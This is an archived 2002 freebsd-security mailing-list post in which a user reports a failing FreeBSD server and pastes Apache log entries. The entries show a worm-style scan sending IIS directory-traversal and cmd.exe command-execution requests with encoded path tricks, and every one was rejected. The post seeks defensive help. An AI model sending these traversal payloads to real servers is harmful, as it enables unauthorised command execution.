From owner-freebsd-security Sat Jan 26 9:13:23 2002 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f31.law14.hotmail.com [64.4.21.31]) by hub.freebsd.org (Postfix) with ESMTP id 9F92837B404 for ; Sat, 26 Jan 2002 09:13:12 -0800 (PST) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Sat, 26 Jan 2002 09:13:12 -0800 Received: from 209.124.192.249 by lw14fd.law14.hotmail.msn.com with HTTP; Sat, 26 Jan 2002 17:13:12 GMT X-Originating-IP: [209.124.192.249] From: "William J. Borskey" To: freebsd-security@freebsd.org Subject: weird server activity Date: Sat, 26 Jan 2002 09:13:12 -0800 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 26 Jan 2002 17:13:12.0504 (UTC) FILETIME=[BC21AB80:01C1A68C] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I am running FreeBSD 4.4. I use Apache-fp and openssh. About a week ago my system went down and I wasnt able to log in or look at any web pages. I could connect, but it woud not spawn a process to log me in, or serve me a web document. I got someone to reboot the machine from the console, I was then able to log into the machine. Starting processes was slow but top reports normal system loads. Then after about an hour the machine would no longer run any processes and quickly shut me out by killing the sshd i was connected with. I did get a chance to look at some of my logs, not all unfortuantly. The httpd-access file had some weird sequences of windows sounding paths, but it wasnt code red or anything like code red: 147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 200 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 200 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:12:58 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:12:58 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:12:58 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:12:58 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:13:00 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:13:00 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:13:01 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:13:01 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:13:01 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:13:01 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET "-" 147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:13:05 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 147.46.54.38 - - [19/Jan/2002:15:13:05 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:13:05 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:13:05 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:13:06 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:13:06 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" i havnt been able to look at any other logs and i doubt that that has anything to do with it. William Borskey _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message